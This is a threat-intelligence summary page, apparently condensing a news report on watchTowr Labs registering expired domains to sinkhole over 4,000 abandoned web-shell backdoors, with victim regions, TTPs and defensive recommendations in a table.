Press ESC to close

Expired Domains Allowed Control Over 4,000 Backdoors on Compromised Systems

Category Details
Threat Actors Various threat actors leveraging web backdoors, including China-nexus APT groups (e.g., China Chopper users).
Campaign Overview watchTowr Labs hijacked 4,000+ web backdoors using abandoned or expired domains.
• Cost of operation: as low as $20 per domain.
• Sinkholing performed in partnership with Shadowserver Foundation.
Target Regions (or Victims) • Government entities: Bangladesh, China, Nigeria.
• Academic institutions: China, South Korea, Thailand.
• Other affected regions: Argentina, India, Indonesia, Israel, Pakistan, Philippines, Ukraine, U.S., etc..
Methodology • Registered 40+ abandoned domains used for C2 communication.
• Observed beaconing activity from compromised hosts.
• Some web shells backdoored by original maintainers, inadvertently exposing them further.
Product Targeted • Systems with web backdoors (e.g., c99shell, r57shell, China Chopper).
Malware Reference Web shells: China Chopper, c99shell, r57shell.
Tools Used Web shells (for persistent remote access and exploitation).
Vulnerabilities Exploited • Reliance on abandoned infrastructure and expired domains for C2.
• Backdoors in web shells leaking deployment locations.
TTPs Hijacking abandoned infrastructure.
Sinkholing domains.
Monitoring compromised hosts through beaconing activity.
Persistent access via web shells.
Attribution • Conducted by watchTowr Labs.
• Observed China-nexus APT groups leveraging certain web shells (e.g., China Chopper).
Recommendations • Monitor and secure infrastructure to avoid domain expiration.
• Regularly check for unauthorized web shells on systems.
• Implement strict access controls and real-time monitoring for beaconing activity.
Source The Hackers News

Read full article: https://thehackernews.com/2025/01/expired-domains-allowed-control-over.html

The above summary has been generated by an AI language model

Stay Updated with Our Newsletter

  

Source: TheHackersNews

Published on: January 14, 2025

Leave a Reply

Your email address will not be published. Required fields are marked *